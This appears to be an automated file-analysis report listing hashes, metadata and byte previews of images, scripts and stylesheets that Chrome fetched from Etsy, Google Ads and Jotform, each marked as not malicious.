                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................=Q...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................=Ymdat.....&ey_.....2....p.E.Q@..o....|..Eo..sY.)..u..........p..m'I..h..Q%.!Z.<....XG...D....M/bm./D....NV.d.j.[1c~.ap...?!.Y........hK..J..A....h....t.;....O.....!...t2.......L..ia......~i..K.<.T.w&...p+.Z......@......^d...gB}......|......i...P.@.,...*......g)[.vK@y.........Z.....+f..#.<.]..emV5. <\............9DEg.......]..4...c<UV..>..d..SQ........PV.o_.vh.g.d.U&..n4.... .5..p.P_..n....0[.n...CUk..h..d/...s...xP..............sgZ...N.c.Q.!...&..A...UG...!....."...L.....c..v.....XOm.<.....d....#..ua..}*[bC...A.;.....SN....4.#"M......(...........^&)I...J..Q>a...{@.k+S...{..!o....].....t..].V.{._..B.G...k.>..-..Q...a..Oxs.k.....ic8Dii. ..i. .vOsq.....X.vz.....F....wl..t....C.>.\.cQgG<;q-.}c
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):70333
                                                                                                                                                                              Entropy (8bit):7.965313668292421
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2E6F8BD41B54F107172B3D761C0721F7
                                                                                                                                                                              SHA1:AE941C236CCD52C97D1B3359F0FB1FC6DD613FC9
                                                                                                                                                                              SHA-256:BD959236374E0A17AB3D2CD67F3BFF34A900D0EF61E40CADEA93BFF0FFC75EFB
                                                                                                                                                                              SHA-512:28ECB87E3DFF6676617775F0F54B73FA9E24643C7E552508A1F447DFA33751711BAA17E914CACC0B046C7EB3BAD957CF63DE77E24D44A84F9C2183AD6FA4D8DF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X.."........................................C.........................!1A."Qa..2q.B.#R...b...$3r...CS..%...cs...............................-.....................!1..AQa.."2qB...3R.b..............?.........)b...{..9*~....G...O.y..N}...r..C.Oz.G..}..@.w&3..f..Q.=..&.:..%.R.1.U=y.....<{W$..?
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):2306
                                                                                                                                                                              Entropy (8bit):7.730588244897272
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8B554A52E78AA1A35EAA120341A308EA
                                                                                                                                                                              SHA1:7638A609AFE35555180A66A78BCF4CD2A8195CBA
                                                                                                                                                                              SHA-256:27A3B9EA97C822EC8ED3328C98B8B3848B2ECE70EBCE7BE9D556AF3D8BA04FCE
                                                                                                                                                                              SHA-512:37F7038E0347A3079F400287D04419903FA51385F631D42A87412E77D13DD3CA1F7D7C1A20501BC0B61B7D0A270DBECC1BB36C3D8EE649BA7160F4E23CAE316E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/28846747/r/il/2aed65/6337961979/il_340x270.6337961979_fs9k.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma...................mdat....."*p...h4 2..Dx..I$P.g_.>...%..#..jU-..5..b.....4....8.F.l;k:.D"..f....~.i..`.. $.].K....v......?.Y,.E.N...>..z....I..=:xf&..je..I|.6.wv..w.....Ep....f......D8C!I.....Q......6D"...n.eWuq....3:.;...zO.X.(.j..J...l......#u.I...2..M...s.x.:p..qF.8.<R.|...Mo.").{..0i.jo.ac........i...4.=..L.....Y.7......m..`.9.....H&..E...W=.....DD.H.q...\..h...&.g.G....>./..A...k.....!..;.~..!3...J<q/...G0..}k.2.Gl0+..f........M....4..[...D.[...s......T....M...u?D..Lb_........1.<..qu.M...|.Jk;JH.......iZ.`..a..Yk.R@].cU..G.!.2...~......$...7.}..5...ZJ....4)x.Y.SG......d.....Y.....@5u..........a.....\....P6.tt.Y.....G.9..)}..>..@.......w..N....&.....i1<p.5N.a.zq< .[...)w..^H*.(.%D...=...j...L.+....z...X..+..7.S}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):24013
                                                                                                                                                                              Entropy (8bit):7.989309452225326
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A1B6A560906D11D63EE973CBB8AF1A3A
                                                                                                                                                                              SHA1:B3DF903D4337F55094366F133A1F698B39D98B12
                                                                                                                                                                              SHA-256:EFC372BC41A56C8B11449F58DF771798F2769FFC7246C31670D8D850EEBBD4A1
                                                                                                                                                                              SHA-512:00B0B8126192BC15728EB671C561C3F86C307982F5D1B33404FF7FE758ABA21C637EF34DA66157EF3658BFB54A6C1C3811B421C0B190D219AD37A0D264940251
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/14200326/c/1365/1365/342/0/il/c5b7c7/4285057828/il_600x600.4285057828_dia2.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................\....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................\.mdat.....&ey_.....2.... ...A@.....4.I..i..5Ci.K...d...{.Fk+.*~T.FD. ..J.I..!J...t3T......&.FzS.DG.d....X..K......C..{Q.....G.$ik....>z.}....h(.#.*..N@.(.0rL.E.,... ....g.W..y....p!.N.f.C.'...........E..~....9...'+..@H.....w.4.FR{w...W.........no$.6..jZ?.P....;a..$..........,.......F...?..S...v..Y.].%..@.s<..p|...u...-.|...2y~P..9Q...A[.A]....02?.*{r..`.........)(`...lZ...(...............(J..n.....E@.uc....4..a.9....(..R...... Q.\).....=.m.._.. .h(..S.......|.@.....'D ..1_.....G....D......T.._..1U..............gyH......?.\|E.({....Y......P. 3..m}.I:C..G.<....d=..q.N......'e..QTq.U...J.f.).*..]9...6zL...W)K^.5i..{._.*.....U....%...|6... .19..,N..ta.u.h..W-...ZD.._F...x.../..y....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (41165)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):41521
                                                                                                                                                                              Entropy (8bit):5.481286181240014
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1602B89B6707B920F3FDFDEDB35F8843
                                                                                                                                                                              SHA1:8AE0DC6B5C7152F02241F047FDCD274EB7356463
                                                                                                                                                                              SHA-256:B59CBD7FE0EB5E5ADE9BF31B77EC4D2D88CD602CB6CA79B63B4E20D0CD45D832
                                                                                                                                                                              SHA-512:E2EB60A6D99348AC088EE5BA1060E20F2CE465C9CC0EF5AD638ECA971B951625265E17A3CC0154307460AFF3813460EAAFB834FB318F44A0E911CE160C1D5EED
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/async/component-islands/auto/search2_neu/common/SPAPagination/App.050b3e23c4f951714e4e.js
                                                                                                                                                                              Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/async/component-islands/auto/search2_neu/common/SPAPagination/App.050b3e23c4f951714e4e.js.LICENSE.(self["jsonp-component-islands"]=self["jsonp-component-islands"]||[]).push([["auto/search2_neu/common/SPAPagination/App"],{92662:(t,e,n)=>{"use strict";n.d(e,{default:()=>r});var s=n(17456);const a={"rate-n-stars":[["{{value}} stars","{{value}} star","{{value}} stars"],[["is",[0]],["is",[1]],["else"]]],"rating-tooltip-1":"Disappointed","rating-tooltip-2":"Not a fan","rating-tooltip-3":"It's okay","rating-tooltip-4":"Like it","rating-tooltip-5":"Love it",loading:"Loading",error:"Error","new-tab":"Opens a new tab","remove-action":"Remove","dismiss-action":"Dismiss","undo-action":"Undo","select-all":"Select all","add-file-label":"Add file","drop-file-or-label":"Drag and drop or","file-size-bytes":"{{size}} b","file-size-kilobytes":"{{size}} kb","file-size-megabytes":"{{size}} mb","file-size-gigabytes":"{{
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5270
                                                                                                                                                                              Entropy (8bit):7.704667735504766
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4F13786EFB23D110961484E08DC8EE1A
                                                                                                                                                                              SHA1:9C2E4E0B56B84CFB663DCD80E73E6E114B8C02A5
                                                                                                                                                                              SHA-256:71D12895D3EC87957452C1673834FDC343317A60A42D3554072D62944B60033E
                                                                                                                                                                              SHA-512:07BB525ED43D2015FDD714B9D0D64F1F9897C9BCA072DC20A9BE0C8F5938FAC39D13AA86D35742AE53A6BC3BFC9D4192AE834D41E33372CBEFF0F58F260A443B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......d.d..".........................................<.........................!.1..AQ"a..#2Bq...b.$Rr....34Ss.................................0........................!1.Q."Aaq.#2r.......B.............?...Y.....U..t......I-u.a.0...Y...r...'\.+.^)#.=.M"J.....(Ub.....U<..H .3.j......g.n]Oe.T
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):74768
                                                                                                                                                                              Entropy (8bit):7.9750618278995695
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2A254C1B4EF9CD6BE1D49F237715BFD8
                                                                                                                                                                              SHA1:632BAC8B6A0CEC2DCCBE2722D1A50C4D727E96F7
                                                                                                                                                                              SHA-256:F01633D13F551B5874D4EF11E9A5E477D0BA6D6A5C12158F8A0A70D7DCFBECED
                                                                                                                                                                              SHA-512:6A19CDFBF1CA4BD853CB342B4F848C8409C319BAF8811822F75A23B7DEBEA492F6A30048851BCEFBA2546BBDD683D0966912226AD39C6ECBE841929B2CBB8ECC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......X.X.."........................................C.........................!1A."Qaq...2.#BR....br..$3..C.4Sc...%..s................................9.......................!1.AQ.a."2q....B....#R3...br...............?..../.....9.T:..r....>..up....H.....Rz~SDmnf.....%..c.O$..T( 7.>..1..O..2.?q.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):63232
                                                                                                                                                                              Entropy (8bit):7.971201743860472
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3B637893471D5D960FCD1A21285A6801
                                                                                                                                                                              SHA1:53013C6A72ACAD7C7D014F0CCD9ADA636A15CDD3
                                                                                                                                                                              SHA-256:8E087DABC6A84B2E26D21B113E471BC29546473A4BEB028F22893C40B6CD3943
                                                                                                                                                                              SHA-512:2996F3BA382604A5F99BE367A51DA9B7CCF95379037A499A8EB86974F456A77110E74E7C107195E3A536E7AC788BD6704C663D69A4C79DF3D3F7B87E504A671F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................E........................!..1A."Qaq...2B.#R....3..$br.......%4Cc.S..................................>.......................!1..AQa."2q....B...#R3b...4Cr.$Ss.c..............?...c.>9....$F...Q.J.9 R?0...vc.........w.&q5rX.l.Ni.hOQ[.x.+|.8.&...F..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (1913), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1913
                                                                                                                                                                              Entropy (8bit):5.270926464935564
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0B36C426FF606E7E0B0232F29E202F77
                                                                                                                                                                              SHA1:A2277EF22D32443DDEF7EB39FC1F9978CE63D596
                                                                                                                                                                              SHA-256:57071AE64A57D1CFD1B2AF89803D0F34C954AE62AF77945B679719E631006683
                                                                                                                                                                              SHA-512:056C39F067B5E40D6DBD9668E9DC9593CBFBBE778F3620C405207D60A17035D2AA1734627C0EB24F9EFC623A00891079EDDCD2A82E3BF4A6D534875172CDA2EF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://lantern.roeyecdn.com/lantern_global_6220.min.js
                                                                                                                                                                              Preview:var lanternTracker=function(e,t){function n(e){return e?(e^16*Math.random()>>e/4).toString(16):([1e7]+-1e3+-4e3+-8e3+-1e11).replace(/[018]/g,n)}return{doTrack:function(r){r=void 0===r?{}:r,etsy_region=Etsy.Context.data.locale_settings.region.code,etsy_is_eu=Etsy.Context.data.locale_settings.region.is_EU_region,"GB"===etsy_region?r.site="6091":"US"===etsy_region?r.site="6220":"CA"===etsy_region?r.site="6939":"FR"===etsy_region?r.site="7432":"DE"===etsy_region?r.site="7634":"NL"===etsy_region?r.site="9208":"IT"===etsy_region?r.site="9607":"ES"===etsy_region?r.site="10501":"AU"===etsy_region?r.site="10781":"DK"===etsy_region||"FI"===etsy_region||"NO"===etsy_region||"SE"===etsy_region?r.site="8917":!0===etsy_is_eu?r.site="10723":r.site="10690";var i,o,s,a,g,c=t.referrer||"",d=t.referrer.split("/")[2]||"",l=e.location.href||"",_=e.location.hostname||"",y=navigator&&navigator.userAgent?navigator.userAgent:"";if(t.cookie.indexOf("lantern=")>=0);else{var p=n();i="lantern",o=p,(s=60)?((a=new Da
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):30032
                                                                                                                                                                              Entropy (8bit):7.990923063948321
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8CC6F1516FC094408007833C8BB8F15A
                                                                                                                                                                              SHA1:3A7AFFA35DEA75C989D9EC64B975028926775097
                                                                                                                                                                              SHA-256:3CE18B494688E3C1A81BDD56673F90B17E098B7043C0BE64755F97FD6F4A9993
                                                                                                                                                                              SHA-512:C8972902C54B25265352206B2DC23015777B01446499BB37F27A552AFFBC73838C32F119DF9750285DA31A4879C4A2B08F3B224C77C42808E294D855391BF471
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/25837545/r/il/6baffe/5555131821/il_600x600.5555131821_q5ty.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................tB...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................tJmdat.....&ey_.....2...DT.A..P.."..U..jC@..*.u...M..k.i2z@.hf...X./S.1..]\nf.....r\_.O......2i..W..9....c...a....x.4..._].:.Z...xi.V9...r....M.........-H.'.E.W[..|3.............)..4..cwy._.0.$......k2....@.i.0.&.....jG.l.N..N......k....o.s..G.(E....7.[..1.P)s-.....TE././._.w..^|.B.....Hi[i........-l;..N..hS.L..,......hQ..,....+..pQ...UQ..i.....z.x.t...*"..z19!.0E...Nl..=CH...s...+..1.......[...b'.E."Swn.7.......!..R.....gj#.gA3.+.U.8J,.......#...NJ....-Lz.....5H.j,..Y......<>.R.6..J.j....^.5.Z"....Z.........b..;..&....!NpN..3....20.....{.....KH./..&..no..@....X..6V+p*....5.y...>:.n<....L....(.S....p4......}s..o.C-.*.w........../?.......Az..^......2gU.^<....~.......l4>.!....g..).....3..>......!lh.Y.D
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):10759
                                                                                                                                                                              Entropy (8bit):7.872499490537862
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A607EBAEF3F14F76517364F477E93094
                                                                                                                                                                              SHA1:4CE16D989EDD991F90AFCE97CD1CD07A8294A170
                                                                                                                                                                              SHA-256:AD567857EC86D4378736987E6741A78095AD1149630D1273896C1933D82F34C4
                                                                                                                                                                              SHA-512:031728E727D964E9885C1E829DB00B8089C63B06A1B8D44381795DB61C0364605E100EEAD2E2DAF80E59A6032B32EF8E64007EDB10A60BC644C983133E2FF163
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......,.,.."........................................>........................!..1A.Qaq.."2.#B....Rr.3b..$C%Sc...................................4.......................!.1AQ.."aq2.........#Bb.C..............?...(Ot.....do....L..$.n.%.<#.7R....L..P.BxB....M..F...!.!.P.B...!.@B...hB.!4,. $&......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5460), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5460
                                                                                                                                                                              Entropy (8bit):5.859582391492334
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7CE0B4B6B1BEBDE9F7E2982DC3C9D3FA
                                                                                                                                                                              SHA1:60A1F2E1CDDAE6AB596150BF4D9137235D7D4803
                                                                                                                                                                              SHA-256:FC2DEAAD2CFDE5F5A155383B0A66FD40C0AE46A1B9ABB0278AE78CE97FF1364A
                                                                                                                                                                              SHA-512:D28B5989DF0FF4A92F07F686336E9C81B1E11CE88AAD20D15E1A691BF23C58A4344379A10EF680A41228A53B588ED400A2C3559A1C17B7507A744875018079FC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/995917074/?random=1729505296371&cv=11&fst=1729505296371&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101836706&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue&hn=www.googleadservices.com&frm=0&tiba=Felt%20decor%20-%20Etsy&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D736202387%2C1610452380%2C1794576675%3Becomm_pagetype%3Dsearchresults%3Becomm_totalvalue%3D%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):643
                                                                                                                                                                              Entropy (8bit):7.5092985204332106
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:252AF0CB9233D5CE3164652B5F6E167F
                                                                                                                                                                              SHA1:2636C0E95CB0E55EFD2B2D0F2393F1C94ED2AE7F
                                                                                                                                                                              SHA-256:6F5D5F888FD58A0E5836F4B4E9A9A7E464FCB37E6020EACE0D6DE1F11453F375
                                                                                                                                                                              SHA-512:8E4930897029C6EB7D5120543AE9EFE1D234C4F1D45C91BEA2C7EBD139975C513116D222382F5DF23FADBBE4C66C0BC8D83E929B57896943379DE37959E213FC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://submit.jotform.com/images/reload.png
                                                                                                                                                                              Preview:.PNG........IHDR................a....tIME.....3%eL.....pHYs..........iTS....gAMA......a.....IDATx..R=hSQ.=.....K...F......A..ODp(f...R(...!P..*.t2v... B']....vp..A..&1I_C.&4.{^.&$&...>..{....._p]..uy...]....)]..x..{#..Z8w}!!8.T\.....a.I.V.M<.w...Bz.F.=.2.xur......}..P. ..V.(.x..@Z.......h.....@Q...#u=!.9.....-..XHDF.h.....J.|...\....&$..+5..<O:..MT\MY.}p...t..v.)../...Hi..re............>...Kq.R.......F.;}....AJ..3S.Y1.S...A.!9?..z.....l...2..@.D....=.N8............G.V..P......c..P...).V..-......9.D"n&.!.a._.dj....=.0.8..dCO.....|..V.K.x.tk..VYI:..Z]Z...L..1..u......*?|.&!....7B\G..eu..^.....P.....:...q=....IEND.B`.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):522231
                                                                                                                                                                              Entropy (8bit):5.180208275811529
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C66A3029A46C91961DCC41A008C82166
                                                                                                                                                                              SHA1:CADC02A8165255CE23754147E1573D215F1BF850
                                                                                                                                                                              SHA-256:C1672C9FC2E18C611E5BC9A6306D500AF26EDC265FAED49656ECD2F121052BAD
                                                                                                                                                                              SHA-512:AD4DE72FCAA14365987D2CFFCD757D981B8FDD5A5009F59B8D88B988F6ED60B440A045DA7047D46D03D8FEEBE18E82BB9E3E76062ADBFB211F936D2A37C4FC68
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://submit.jotform.com/themes/CSS/5e6b428acc8c4e222d1beb91.css?
                                                                                                                                                                              Preview:@import "https://cdn.jotfor.ms/fonts/?family=Inter&display=swap";*,:after,:before{box-sizing:border-box}:focus{outline:0}input,select,textarea{outline:0;margin:0;text-align:left}select{-webkit-appearance:none;appearance:none}img{max-width:100%}a{text-decoration:none}textarea::-webkit-resizer{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg width='6' height='6' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill-rule='evenodd' clip-rule='evenodd' d='M5.852.148a.504.504 0 00-.713 0L.148 5.139a.504.504 0 10.713.713L5.852.861a.504.504 0 000-.713zM5.86 3.14a.48.48 0 00-.68 0L3.142 5.18a.48.48 0 10.68.68L5.86 3.82a.48.48 0 000-.68z' fill='%23C3CAD8'/%3E%3C/svg%3E");background-size:7px;background-repeat:no-repeat;background-position:50%}select::-ms-expand{display:none}button{outline:0}:-ms-input-placeholder{color:#8894ab;font-weight:300;font-family:inherit}::placeholder{color:#8894ab;font-weight:300;font-family:inherit}.form-dropdown.is-active{color:#000}.form-dropdown:
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (4426)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):71087
                                                                                                                                                                              Entropy (8bit):4.815690339359442
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:39B8298792A66F5E871F5FBAD12A91BD
                                                                                                                                                                              SHA1:8FC684B82E3945C6E0EBBF3D9C93F2F55EB89EB7
                                                                                                                                                                              SHA-256:D1ABE8478FF50B769CC4266C728F81CF7AB632493B5B87002477673A791BD031
                                                                                                                                                                              SHA-512:A5B7118FAAE4A617542B365AEA6BDDAFF9DD59A978C5F8506C37668A42714815E1FAD45165B480A2C2BA0250763C6DEC88306DFE943E533FC9B6D0C4D3A892B1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
